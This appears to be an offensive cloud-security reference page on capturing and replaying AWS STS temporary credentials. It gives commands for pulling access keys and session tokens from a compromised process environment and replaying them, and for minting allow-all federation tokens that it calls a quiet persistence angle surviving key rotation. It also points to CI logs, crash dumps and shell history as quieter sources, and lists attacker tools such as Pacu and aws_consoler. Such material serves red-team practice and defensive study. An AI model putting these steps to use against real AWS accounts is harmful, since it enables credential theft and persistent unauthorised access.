Temporary STS credentials are a triple: an ASIA-prefixed access key, a secret, and a session token, with an expiry. They are what roles, federation, and the metadata service hand out, and they are reusable from anywhere until they expire, so lifting them from a process, a log line, or an environment variable is often enough to continue as the principal.
Capturing and replaying#
# in a compromised process environment
env | grep -E 'AWS_(ACCESS_KEY_ID|SECRET_ACCESS_KEY|SESSION_TOKEN)'
export AWS_ACCESS_KEY_ID=ASIA... \
AWS_SECRET_ACCESS_KEY=... \
AWS_SESSION_TOKEN=...
aws sts get-caller-identity # confirm identity and that it is still valid
Checking scope and lifetime#
aws sts get-caller-identity # the assumed-role ARN tells you what you are
# decode the token's expiry from the source that issued it (role max-session-duration)
Minting and extending sessions#
Holding a user's long-term key lets STS mint fresh sessions to use elsewhere:
# MFA-gated session, where a policy requires MFA for the actions you want
aws sts get-session-token --serial-number <mfa-arn> --token-code 123456
# a scoped session that also feeds a console URL; GetFederationToken
# sessions last up to 36 hours
aws sts get-federation-token --name op \
--policy '{"Version":"2012-10-17","Statement":[{"Effect":"Allow","Action":"*","Resource":"*"}]}'
GetFederationToken is a quiet persistence angle: the triple it returns drives a console sign-in URL (see credential brokers) and keeps working after the originating key is rotated, for the life of the token.
Exploitation notes#
- When an API call is denied with an encoded authorization message,
aws sts decode-authorization-message --encoded-message <msg>reveals the exact failed action and policy context, mapping the principal's boundary fast. ASIAkeys without the session token are useless; always grab all three.- Tokens from role chaining are capped at one hour; tokens from a direct assume can last up to the role's max session duration.
- Session credentials often appear in CI logs, crash dumps, and shell history, which are quieter sources than live memory.
Tools#
- AWS CLI (
sts get-caller-identity,get-session-token,get-federation-token,decode-authorization-message). - aws_consoler (NetSPI): convert a session triple into a console sign-in URL.
- Pacu: import session credentials and continue enumeration.